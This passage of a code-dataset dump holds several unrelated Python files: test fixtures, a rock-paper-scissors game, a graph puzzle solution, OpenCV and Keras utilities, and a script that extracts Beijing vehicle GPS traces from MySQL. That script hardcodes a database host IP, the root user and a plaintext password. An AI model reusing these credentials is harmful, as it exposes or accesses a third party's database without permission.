])\n epsilon = xx[:, 0]\n u = xx[:, 1]\n\n sigma = toeplitz([np.power(0.5, k) for k in range(1, dim_x + 1)])\n x = np.random.multivariate_normal(np.zeros(dim_x),\n sigma,\n size=[n_obs, ])\n\n I_z = np.eye(dim_z)\n xi = np.random.multivariate_normal(np.zeros(dim_z),\n 0.25*I_z,\n size=[n_obs, ])\n\n beta = [1 / (k**2) for k in range(1, dim_x + 1)]\n gamma = beta\n delta = [1 / (k**2) for k in range(1, dim_z + 1)]\n\n I_x = np.eye(dim_x)\n Pi = np.hstack((I_x, np.zeros((dim_x, dim_z-dim_x))))\n z = np.dot(x, Pi) + xi\n\n d = np.dot(x, gamma) + np.dot(z, delta) + u\n y = alpha * d + np.dot(x, beta) + epsilon\n\n x_cols = [f'X{i + 1}' for i in np.arange(dim_x)]\n z_cols = [f'Z{i + 1}' for i in np.arange(dim_z)]\n data = pd.DataFrame(np.column_stack((x, y, d, z)),\n columns=x_cols + ['y', 'd'] + z_cols)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(253, 10, False), (501, 52, False),\n (253, 10, True), (501, 52, True)])\ndef generate_data_cv_predict(request):\n np.random.seed(3141)\n # setting parameters\n n_p_c = request.param\n n = n_p_c[0]\n p = n_p_c[1]\n classifier = n_p_c[2]\n\n # generating data\n if classifier:\n x, y = make_classification(n_samples=n, n_features=p)\n else:\n x, y = make_regression(n_samples=n, n_features=p)\n data = (x, y, classifier)\n\n return data\n","sub_path":"doubleml/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"115543234","text":"rock_0 = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\nRock'''\n\npaper_1 = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\nPaper'''\n\nscissors_2 = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\nScissors'''\n\n#Rock, Paper, Scisors Game\nimport random\nchoose = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper, 2 for Scissors. \"))\n\n\nif choose >= 3 or choose < 0:\n print(\"You entered an invalid number\")\nelse: \n comp_random = random.randint(0,2)\n my_list = [rock_0, paper_1, scissors_2]\n print(my_list[int(choose)])\n print(\"\")\n print(\"Computer choose:\")\n print(my_list[comp_random])\n\n if choose == 0 and comp_random == 2:\n print(\"you win\") \n elif choose == 1 and comp_random == 0:\n print(\"you win\")\n elif choose == 2 and comp_random == 1:\n print(\"you win\") \n else:\n print(\"you loose\") \n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"459418232","text":"\"\"\"\ndfs 는 항상 bfs 로 대체가능한 줄 알았는데 아닐수도..?\n\n\"\"\"\nfrom collections import defaultdict, deque\nimport queue\n\n\nN, M = map(int, input().split())\n\ngraph = defaultdict(list)\nfor _ in range(M):\n a, b = map(int, input().split())\n # graph[a] = b\n graph[a].append(b)\n\nfor n in range(1,N+1):\n if graph[n] == []:\n graph[n].append(n)\n\ncnt_dict = {x:0 for x in range(1,N+1)}\ndef parent(x):\n if graph[x] == [x]:\n cnt_dict[x] += 1\n return [x]\n else:\n new_parent = []\n for p in graph[x]:\n new_parent.extend(parent(p))\n\n graph[x] = new_parent\n return new_parent\n\nfor n in range(1,N+1):\n parent(n)\n\n# print(graph)\n# print(cnt_dict)\n\n# cnt_dict = {x:0 for x in range(1,N+1)}\n# def dfs(node):\n# cnt_dict[node] += 1\n# for adj in graph[node]:\n# dfs(adj)\n\n# for n in range(1,N+1):\n# dfs(n)\n\n\nmax_val = max(cnt_dict.values())\nanswer = [k for k,v in cnt_dict.items() if v == max_val]\nprint(' '.join(map(str, sorted(answer))))","sub_path":"bakjoon/효율적인해킹.py","file_name":"효율적인해킹.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"79842697","text":"class Nation:\n import openpyxl\n from openpyxl.utils import get_column_letter\n\n WB = openpyxl.load_workbook(r\"C:\\Users\\smeg\\Desktop\\F1M001\\Data\\Countries.xlsx\")\n WS = WB[\"List1\"]\n HEADERS = {}\n i = 1\n for header in WS[1]:\n HEADERS[header.value] = i\n i+=1\n\n COUNTRIES = {}\n i = 0\n for country in WS[get_column_letter(HEADERS['SHORT'])]:\n COUNTRIES[country.value] = i\n i+=1\n\n def __init__(self, nation):\n assert nation in Nation.COUNTRIES.keys(), \"Sorry, wrong nation given\"\n\n self.nameEng = Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"NAME\"])][Nation.COUNTRIES[nation]].value\n\n self.nameRus = []\n self.nameRus.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS\"])][Nation.COUNTRIES[nation]].value)\n self.nameRus.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_2\"])][Nation.COUNTRIES[nation]].value)\n self.nameRus.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_3\"])][Nation.COUNTRIES[nation]].value)\n self.nameRus.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_4\"])][Nation.COUNTRIES[nation]].value)\n self.nameRus.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_5\"])][Nation.COUNTRIES[nation]].value)\n self.nameRus.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_6\"])][Nation.COUNTRIES[nation]].value)\n\n self.nameEngAdj = Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"ADJECTIVE\"])][Nation.COUNTRIES[nation]].value\n self.nameRusAdj = []\n self.nameRusAdj.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_ADJECTIVE_M\"])][Nation.COUNTRIES[nation]].value)\n self.nameRusAdj.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_ADJECTIVE_F\"])][Nation.COUNTRIES[nation]].value)\n self.nameRusAdj.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_ADJECTIVE_N\"])][Nation.COUNTRIES[nation]].value)\n self.nameRusAdj.append(Nation.WS[Nation.get_column_letter(Nation.HEADERS[\"RUS_ADJECTIVE_P\"])][Nation.COUNTRIES[nation]].value)\n\n def nameEnglish(self):\n return self.nameEng\n\n def nameRussian(self, index = 0):\n return self.nameRus[index]\n\n def adjEnglish(self):\n return self.nameEngAdj\n\n def adjRussian(self, gender = 'M', capital = False):\n result = \"\"\n if gender == 'M':\n result = self.nameRusAdj[0]\n elif gender == 'F':\n result = self.nameRusAdj[1]\n elif gender == 'N':\n result = self.nameRusAdj[2]\n elif gender == 'P':\n result = self.nameRusAdj[3]\n else:\n raise ValueError('Wrong gender lexem passed!')\n if capital: result = result.capitalize()\n\n return result\n\nclass Driver:\n def __init__(self, name, surname, gender, birthdate, nation):\n self.name = name\n self.surname = surname\n self.gender = gender\n self.birthdate = birthdate\n self.nation = nation\n\nclass Bolid:\n def __init__(self, teamName, motorName, sponsorName, nation):\n self.teamName = teamName\n self.motorName = motorName\n self.sponsorName = sponsorName\n self.nation = nation\n\nclass RaceUnit:\n def __init__(self, number, team, driver):\n self.number = number\n self.team = team\n self.driver = driver\n\nnat1 = Nation('RUS')\nprint(nat1.nameEnglish())\nprint(nat1.nameRussian(3))\nprint(nat1.adjEnglish())\nprint(nat1.adjRussian('M', True))\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"6473021","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('./110-150.jpg')\n\nimgResize = cv2.resize(img,(1000,500))\nimgCropped = img[:200,100:300]\n\n\nprint(img.shape)\nprint(imgResize.shape)\nprint(imgCropped.shape)\n\nimg2 = np.zeros((512,512,3),np.uint8) #0~255\nimg2[:] = 255,0,0 # 이미지 전체에 파란색 부여\ncv2.line(img,(0,0),(img.shape[1],img.shape[0]),(0,255,0),3)\ncv2.rectangle(img, (0,0), (250,100),(0,0,255),cv2.FILLED)\ncv2.putText(img, \"OPENCV\", (100,0),cv2.FONT_HERSHEY_COMPLEX,1,(0,150,0),1)\n\n\ncv2.imshow('Image',img)\n\n\ncv2.waitKey(0)","sub_path":"nlp_pytorch/opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"293926297","text":"import cx_Freeze\nimport sys\nimport matplotlib\n\nbase = None\n\nif sys.platform == 'win32':\n base = \"Win32GUI\"\n\nexecutables = [cx_Freeze.Executable('BitCoins.py', base=base, icon='btc.ico')]\n\ncx_Freeze.setup(\n name=\"Bit Coin The app\",\n options={\"build_exe\": {\"packages\": [\"tkinter\",\"matplotlib\"], \"include_files\": [\"btc.ico\"]}},\n version=\"0.01\",\n description=\" The Bit Coin App\",\n executables=executables\n )\n\n","sub_path":"JobCard/project/kinter/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"316859261","text":"import random\nimport numpy as np\nimport pandas as pd\nimport joblib\nimport matplotlib.pyplot as plt\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import export_graphviz\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\nglass = pd.read_csv(\"glass.csv\")\n\n# Split labels\ntrain_, test_ = train_test_split(glass, test_size = 0.15, random_state = 42)\ntrain_labels = train_[\"Type\"]\ntrain_ = train_.drop(columns = [\"Type\"])\ntest_labels = test_[\"Type\"]\ntest_ = test_.drop(columns = [\"Type\"])\ntrain = train_\n\nnewModel = True\nfor i in range(1000):\n\n if newModel:\n currPredictOld = joblib.load('dtc.pkl')\n newModel = False\n count = 0\n tree_predict = currPredictOld.predict(test_)\n for i, prediction in enumerate(tree_predict):\n if prediction == test_labels.iloc[i]:\n count += 1\n pass\n OldAccuracy = count / len(test_)\n\n # # pg.175\n param_grid = [\n {'max_depth':[1,3,5,7,9,11,13,15,17], 'criterion': ['gini', 'entropy'], 'splitter': ['best', 'random']}\n ]\n\n tree_clf = DecisionTreeClassifier()\n grid_search = GridSearchCV(tree_clf, param_grid, cv = 5, return_train_score=True, n_jobs=-1, iid = True)\n grid_search.fit(train, train_labels)\n # print(grid_search.best_params_)\n # print(grid_search.best_score_)\n currPredict = grid_search.best_estimator_\n\n count = 0\n tree_predict = currPredict.predict(test_)\n for i, prediction in enumerate(tree_predict):\n if prediction == test_labels.iloc[i]:\n count += 1\n pass\n NewAccuracy = count / len(test_)\n\n if(NewAccuracy > OldAccuracy):\n newModel = True\n print(i)\n print(\"Old:\", OldAccuracy)\n print(\"New:\", NewAccuracy)\n print(\"Saving new model...\")\n print('\\n')\n export_graphviz(\n currPredict,\n out_file = 'glass_tree.dot',\n feature_names = glass.columns[:9]\n )\n\n joblib.dump(currPredict, \"dtc.pkl\")\n","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"236615182","text":"import pymysql.cursors\nimport random\nimport numpy\n\n\ndef strtonum(str):\n return int(str, 16)\n\n\ndef getx(longitude):\n return strtonum(longitude) - baselongitude\n\n\ndef gety(latitude):\n return strtonum(latitude) - baselatitude\n\n\ndef get_time(timestamp):\n return strtonum(timestamp) - basetimestamp\n\n# print(str(gettime('5645c708')))\n\n'''\ninit node\n$node_(0) set X_ 150.0\n$node_(0) set Y_ 595.05\n$node_(0) set Z_ 0\n'''\n# def writeinitnode(id, x, y):\n# try:\n# tclfile = open(\"trace.csv\",\"a\")\n# tclfile.writelines(str(x) + \" \" + str(y) + \"\\n\")\n# finally:\n# if tclfile:\n# tclfile.close()\n\n\n'''\nafter init node, node trace\n$ns_ at 0.0 \"$node_(0) setdest 150.0 595.05 19.96\"\n'''\n\n\ndef writenodetrace(id, x, y, time):\n try:\n tclfile = open(\"bj_pm_trace.txt\",\"a\")\n tclfile.writelines(str(time)+\",\"+str(id)+\",\"+str(x)+\",\"+str(y)+\"\\n\")\n finally:\n if tclfile:\n tclfile.close()\n\n\ndef write_gps(latitude, longitude):\n try:\n gps_file = open(\"bj_pm_gps.txt\", \"a\")\n gps_file.writelines(str(latitude) + \",\" + str(longitude) + \"\\n\")\n finally:\n if gps_file:\n gps_file.close()\n\n# timeStamp\n# 0\n# 2015-11-13 08:30:00 ----> 2015-11-13 08:35:00\n# 56452f08 -------> 56453034\n# 1447374600\n# 1\n# 2015-11-13 09:00:00 ----> 2015-11-13 09:05:00\n# 56453610 -------> 5645373c\n# 1447376400\n# 2\n# 2015-11-13 22:30:00 ----> 2015-11-13 22:35:00\n# 5645f3e8 -------> 5645f514\n# ‭1447425000‬\n# SQL 查询条件\n# Map setup\n# 1 3*3km\n# latitude 3d05ff longitude b191bb\n# 2 5*5km\n# latitude 3d0dcf longitude b1998b\n\n'''\nLocation AreaSize Time VehicleNumber\nBeijing 3*3 9AM 252\nBeijing 3*3 10PM 193\nBeijing 5*5 9AM 377\nBeijing 5*5 10PM 284\nChengdu 3*3 9AM\nChengdu 3*3 10PM\n'''\n\nbaselatitude = 3996231\nbaselongitude = 11634179\nbasetimestamp = 1447429740\n\n\ntablecondition = \"WHERE `timeStamp`>='5646066c' AND `timeStamp`<='56460810' \" \\\n \"AND latitude>='3cfa47' AND latitude<='3d05ff'\" \\\n \"AND longitude>='b18603'AND longitude<='b191bb'\"\n\n\ndef sqlcreattem():\n sql_creat_tem_table = \"CREATE TEMPORARY TABLE tem_table SELECT * FROM vehicleGPS \" + tablecondition\n cursor.execute(sql_creat_tem_table)\n print(\"create tem table success\")\n return\n\n\ncondition = \" GROUP BY VehicleID\"\n\n\ndef sqlcount():\n sql_query_vehicle_id = \"SELECT VehicleID, COUNT(*) FROM tem_table \" + condition\n cursor.execute(sql_query_vehicle_id)\n return cursor.fetchall()\n\n\ndef getvehicleid():\n vehicleid = []\n sum = 0\n points = sqlcount()\n print(\"query timelength success\")\n for point in points:\n sum += point[1]\n print(\"SUM is \"+str(len(points)))\n avg = sum / len(points)\n print(\"AVG is \"+str(avg))\n i = 0\n num = 3\n for point in points:\n #print(point[1])\n if point[1] >= num: # value = 24\n i += 1\n vehicleid.append(point[0])\n print(\"Number behind \" + str(num) + \" is \"+str(i))\n return vehicleid\n\n\ndef get_all_vehicle_id():\n vehicle_id = []\n points = sqlcount()\n for point in points:\n vehicle_id.append(point[0])\n return vehicle_id\n\n\ndef sqlinfo(id):\n sql_query_vehicle_info = \"SELECT * FROM tem_table \" + \"WHERE VehicleID=\" + \"\\'\" + id + \"\\'\"\n cursor.execute(sql_query_vehicle_info)\n return cursor.fetchall()\n\n\ndef get_origin_vehicle_number_in_seconds():\n seconds_vehicle_number = {}\n seconds_number = numpy.zeros(300)\n vehicle_id = get_all_vehicle_id()\n for id in vehicle_id:\n infos = sqlinfo(str(id))\n for info in infos:\n # print(str(info))\n time = int(get_time(info[2]))\n seconds_number[time] += 1\n for i in range(300):\n if seconds_number[i] > 0:\n index = str(i)\n seconds_vehicle_number[index] = seconds_number[i]\n return seconds_vehicle_number\n\n\ndef get_process_vehicle_number_in_seconds():\n seconds_vehicle_number= {}\n seconds_number = numpy.zeros(300)\n vehicle_id = getvehicleid()\n for id in vehicle_id:\n infos = sqlinfo(str(id))\n for info in infos:\n # print(str(info))\n x = getx(info[4])\n y = gety(info[3])\n time = int(get_time(info[2]))\n if time == 0:\n # transform x, y into longtude and latitude\n longitude = (x + baselongitude) / 100000\n latitude = (y + baselatitude) / 100000\n write_gps(latitude=latitude, longitude=longitude)\n seconds_number[time] += 1\n for i in range(300):\n if seconds_number[i] > 0:\n index = str(i)\n seconds_vehicle_number[index] = seconds_number[i]\n return seconds_vehicle_number\n\n\ndef get_vehicle_info():\n base_id = 1\n vehicle_id = getvehicleid()\n process_vehicle_number = {}\n vehicle_number = numpy.zeros(301)\n end_vehicle_number = 0\n begin_vehicle_number = 0\n for id in vehicle_id:\n infos = sqlinfo(str(id))\n last_time = 0\n last_x = 0\n last_y = 0\n info_number = 0\n for info in infos:\n info_number += 1\n print(str(info))\n x = getx(info[4])\n y = gety(info[3])\n time = int(get_time(info[2])) + 1\n if info_number == 1:\n if time <= 60:\n begin_vehicle_number += 1\n for j in range(time):\n # writenodetrace(base_id, x, y, j + 1)\n vehicle_number[j] += 1\n longitude = (x + baselongitude) / 100000\n latitude = (y + baselatitude) / 100000\n write_gps(latitude=latitude, longitude=longitude)\n else:\n if (time - 60) >= 1:\n writenodetrace(base_id, x, y, time-60)\n if time <= 90:\n longitude = (x + baselongitude) / 100000\n latitude = (y + baselatitude) / 100000\n write_gps(latitude=latitude, longitude=longitude)\n last_time = time\n last_x = x\n last_y = y\n else:\n time_different = time - last_time\n if time_different >= 1:\n add_x = (x - last_x) / time_different\n add_y = (y - last_y) / time_different\n n = 1\n while n <= time_different:\n new_x = int(last_x + (add_x * n))\n new_y = int(last_y + (add_y * n))\n new_time = int(last_time + n)\n if new_time <= 360:\n if (new_time - 60) >= 1:\n writenodetrace(base_id, new_x, new_y, new_time-60)\n vehicle_number[new_time-60] += 1\n n += 1\n last_time = time\n last_x = x\n last_y = y\n # process last info\n last_info = infos[-1]\n x = getx(last_info[4])\n y = gety(last_info[3])\n time = int(get_time(last_info[2])) + 1\n if time >= 360:\n if time < 420:\n end_vehicle_number += 1\n for end_time in range(time+1, 301):\n print(\"%\"*32)\n print(end_time)\n # writenodetrace(base_id, x, y, end_time)\n vehicle_number[end_time] += 1\n print(\"vehicleID\" + str(base_id) + \"complete\")\n base_id += 1\n print(\"#\"*64)\n print(\"begin number is\" + str(begin_vehicle_number))\n print(\"end number is\" + str(end_vehicle_number))\n for i in range(300):\n process_vehicle_number[str(i)] = vehicle_number[i]\n return process_vehicle_number\n\n\n\nif __name__ == '__main__':\n # 连接数据库\n connect = pymysql.Connect(\n host='120.78.167.211',\n port=3306,\n user='root',\n passwd='King@102321',\n db='vehicleBJ',\n charset='utf8'\n )\n\n # 获取游标\n cursor = connect.cursor()\n print(\"connect DB success\")\n sqlcreattem()\n # print(get_origin_vehicle_number_in_seconds())\n print(\"*\"*32)\n # print(get_process_vehicle_number_in_seconds())\n print(get_vehicle_info())\n","sub_path":"2019-09-06/bjpm.py","file_name":"bjpm.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"429109199","text":"import pandas as pd\nimport os\n\nfrom parse_result import ParseResult\nfrom transaction import Transaction\n\n\ndef extract_expenses(df):\n expenses = df[pd.notna(df.expense)].copy()\n return list(expenses.T.to_dict().values())\n\n\ndef parse_xls(filename) -> ParseResult:\n df = pd.read_excel(os.getcwd() + \"/\" + filename)\n size = len(df)\n df = df[6:size]\n df = df.rename(\n columns={\"Unnamed: 1\": \"date\", \"Unnamed: 2\": \"description\", \"Unnamed: 4\": \"expense\", \"Unnamed: 5\": \"income\",\n \"Unnamed: 6\": \"balance\"})\n df = df[['date', 'description', 'expense', 'income', 'balance']]\n\n initial_balance = round(df[df.description == 'SALDO ANTERIOR'].balance.values[0])\n end_balance = round(df[df.description == 'SALDO FINAL'].balance.values[0])\n expenses = extract_expenses(df)\n\n return ParseResult(initial_balance, end_balance, expenses, [])\n","sub_path":"xls_parser.py","file_name":"xls_parser.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"471978387","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport time\n\ndef count_file_lines (file) :\n\t#tic = time.clock()\n\t\t\n\tfile_len = sum(1 for line in file)\n\tfile.seek(0,0)\n\t\n\t#toc = time.clock()\n\t#print toc-tic\n\n\treturn file_len\n\ndef progress_bar (current_iteration, total) :\n\twhole_len = 25\n\t\n\tfill = '█'\n\tpercentage = (current_iteration/float(total))*100\n\n\tfill_len = whole_len*current_iteration//total\n\n\tsys.stdout.write (\"\\rProgress [{0:s}{1:s}] {2:f}%\".format(fill*fill_len, '-'*(whole_len-fill_len), percentage))\n","sub_path":"ProjectKindaStuff/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"428460145","text":"import numpy as np\nimport cv2 as cv\n\nwebcam = cv.VideoCapture(0)\n\nkernel = cv.getStructuringElement(cv.MORPH_ELLIPSE,(3,3))\nfgbg = cv.createBackgroundSubtractorMOG2()\n\nwhile True:\n _,frame = webcam.read()\n\n fgmask = fgbg.apply(frame)\n fgmask = cv.morphologyEx(fgmask, cv.MORPH_OPEN, kernel)\n\n cv.imshow('frame',fgmask)\n if ord(\"q\") == cv.waitKey(1):\n webcam.release()\n cv.destroyAllWindows()\n break\n\n","sub_path":"N40 Webcam background change.py","file_name":"N40 Webcam background change.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"187264460","text":"\n# update for tensorflow\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport random as rn\nimport re\nimport warnings\nimport csv\n\n\nimport tensorflow as tf\n# Force TensorFlow to single thread\n# Multiple threads are a potential source of non-reprocible research resulsts\nsession_conf = tf.compat.v1.ConfigProto( intra_op_parallelism_threads=1, inter_op_parallelism_threads=1 )\n\n# tf.set_random_seed() will make random number generation in the TensorFlow backend\n# have a well defined initial state\n# more details: https://www.tensorflow.org/api_docs/python/tf/set_random_seed\ntf.compat.v1.set_random_seed(515)\n\n# keras / deep learning libraries\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.optimizers import Nadam\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom tensorflow.keras.utils import plot_model\n\n# callbacks\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.pyplot import figure\nimport matplotlib.image as mpimg\nimport pylab as pl\nfrom pylab import savefig\nplt.style.use('seaborn-deep')\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler,MinMaxScaler\n\n# Bayesian networks\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom pylab import *\nimport pyAgrum as gum\nimport pyAgrum.lib.notebook as gnb\n\n# for classification purposes\nfrom pyAgrum.lib.bn2roc import showROC\n\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nfrom sklearn.metrics import roc_curve, auc\nfrom matplotlib import pyplot as plt\nfrom matplotlib.pyplot import figure\nimport matplotlib.image as mpimg\nimport pylab as pl\nfrom pylab import savefig\nplt.style.use('seaborn-deep')\n\nclass LearningTester(object):\n test = \"test! Hello!\"\n\n\n# RECALL -----------------------------------------------------------------------------\n#\ndef recall_m(y_true, y_pred):\n \"\"\"Computes the recal measure of an evaluation setting\n\n Parameters\n ----------\n y_true : list\n list of groundtruth labels\n y_pred : list\n list of predictions from blackbox\n\n Returns\n -------\n recall : vector\n a vector with the recall values between the predictions and the groundtruths\n \"\"\"\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n# PRECISION ---------------------------------------------------------------------------\n#\ndef precision_m(y_true, y_pred):\n \"\"\"Computes the precision measure of an evaluation setting\n\n Parameters\n ----------\n y_true : list\n list of groundtruth labels\n y_pred : list\n list of predictions from blackbox\n\n Returns\n -------\n precision : vector\n a vector with the precision values between the predictions and the groundtruths\n \"\"\"\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n\n# F1 ------------------------------------------------------------------------------------\n# Computes the F1 measure of an evaluation setting\n# y_true: list of groundtruth labels\n# y_pred: list of predictions from blackbox\ndef f1_m(y_true, y_pred):\n precision = precision_m(y_true, y_pred)\n recall = recall_m(y_true, y_pred)\n return 2*((precision*recall)/(precision+recall+K.epsilon()))\n\n# CREATE_MODEL --------------------------------------------------------------------------\n# creates a neural network model with a certain number of hidden layers and a certain \n# number of neurons in each layer.\n# input_dim: an integer specifying the number of input neurons\n# output_dim: an integer specifying the number of output neurons (the number of labels)\n# hidden_layers: an integer specifying the number of hidden layers\n# loss_func: the loss function of the model. By default, it is applied the 'categorical_crossentropy'\n# optim: the optimisation algorithm used in the model. By default it is used the 'nadam' algorithm\n# metrics: a list of strings specifying the metrics to be evaluated ('accuracy', 'f1', 'recall','precision')\ndef create_model(input_dim, output_dim, nodes, hidden_layers=1, loss_func='categorical_crossentropy', optim='nadam', metrics=['accuracy'], name='model'):\n \n model = Sequential(name=name)\n model.add( Dense(nodes, input_dim=input_dim, activation='relu')) # input layer\n for i in range(hidden_layers): # hidden layers\n model.add(Dense(nodes, activation='relu')) \n model.add(Dense(output_dim, activation='softmax')) # output layer\n\n if( optim == \"nadam\" ): # Compile model\n optim = keras.optimizers.Nadam(lr=0.0001, beta_1=0.9, beta_2=0.999)\n\n model.compile(loss=loss_func, optimizer=optim, metrics=metrics)\n return model\n \n# GRID_SEARCH -----------------------------------------------------------------------------\n# Generates a set of models with different configurations, ranging from an\n# initial number of neurons to a maximum number of neurons\n# start_nodes: an integer specifying the initial number of neurons to generate a model from\n# max_nodes: an integer specifying the maximum number of neurons to generate a model from\n# max_hlayers: an integer specifying the maximum number of hidden layers to generate a model from\n# debug: boolean that acts as a flag. If True, it displays the characteristics of each model\n# metrics: a list of strings with the metrics to be evaluated \ndef grid_search_model_generator(n_features, n_classes, start_nodes = 1, max_nodes = 12, max_hlayers = 5, debug = False, metrics = ['accuracy'] ):\n\n models = []\n\n # generate different models with different neurons and different hidden layers\n for neurons in range(start_nodes, max_nodes+1):\n for hidden_layer in range(1, max_hlayers+1):\n model_name = \"model_h\" + str(hidden_layer) + \"_N\"+str(neurons)\n model = create_model(n_features, n_classes, neurons, hidden_layer, name=model_name, metrics = metrics)\n models.append( model ) # add the generated model to a list\n\n # plot general information for each model\n if( debug ): \n for model in models:\n model.summary()\n\n return models\n\n# PERFORM_GRID_SEARCH -------------------------------------------------------------------\n# given a list of models with different configurations, fit the data to the models,\n# and evaluate the model. This function returns a list of training histories for each model\n# models: list of models\n# X_train: \n# Y_train: \n# X_validation: \n# Y_validation: \n# X_test: \n# Y_test: \n# batch_size: \n# epochs: \ndef perform_grid_search( models, path, dataset_name, X_train, Y_train, X_validation, Y_validation, X_test, Y_test, batch_size, epochs ):\n\n\tHISTORY_DICT = {}\n\t\n\t# define the callebacks to take into consideration during training\n\t# stop training when convergence is achieved after 10 iterations\n\tearly_stop = EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='min')\n\t\n\t# save the best model after every epoch\n\tmodel_checkpoint = ModelCheckpoint(path + \"training/\" + dataset_name + \"/model_{epoch:02d}-{val_loss:.2f}.h5\", monitor='val_loss', verbose=0, save_best_only=True, mode='min')\n\tcallbacks_list = [early_stop, model_checkpoint]\n\t\n\t# grid search over each model\n\tfor model in models:\n\t\t\n\t\tprint('MODEL NAME:', model.name)\n\t\thistory_callback = model.fit(X_train, Y_train, batch_size = batch_size, epochs = epochs, verbose=0, validation_data=(X_validation, Y_validation), callbacks=callbacks_list)\n\t\tscore_test = model.evaluate( X_test, Y_test, verbose=0 )\n\t\tscore_train = model.evaluate( X_train, Y_train )\n\t\t\n\t\tprint('Test loss: ', format(score_test[0], '.4f'), '\\tTrain loss: ', format(score_train[0], '.4f') )\n\t\tprint('Test accuracy: ', format(score_test[1], '.4f'), '\\tTrain accu: ', format(score_train[1], '.4f') )\n\t\tprint('Abs accuracy: ', format( np.abs( score_test[1] - score_train[1] ), '.4f'))\n\t\tprint('Abs loss: ', format( np.abs( score_test[0] - score_train[0] ), '.4f'))\n\t\tprint('\\n###########################################################\\n')\n\t\t\n\t\tHISTORY_DICT[model.name] = [history_callback, model]\n\t\n\treturn HISTORY_DICT\n\n# SAVE_MODEL -----------------------------------------------------------------------------\n# saves a trained model into a json and hdf5 file\n# model: model to be saved\n# model_name: string with model name\n# path: string with path to save\ndef save_model( model, model_name, path ):\n\t# serialize model to JSON\n model_json = model.to_json()\n with open(path + model_name+\"_DUO.json\", \"w\") as json_file:\n json_file.write(model_json)\n json_file.close()\n\n # serialize weights to HDF5\n model.save_weights( path + model_name+\"_DUO.h5\")\n print(\"Saving files:\")\n print(path + model_name+\"_DUO.json\")\n print(path + model_name+\"_DUO.h5\")\n print(\"Model saved to disk\") \n\n# SAVE_MODEL_HISTORY -------------------------------------------------------------------\n# saves a trained model into a csv file\n# model_hist: history of the model to be saved\n# model_name: string with model name\n# path: string with path to save\ndef save_model_history( model_hist, model_name, path ):\n file = open(path + 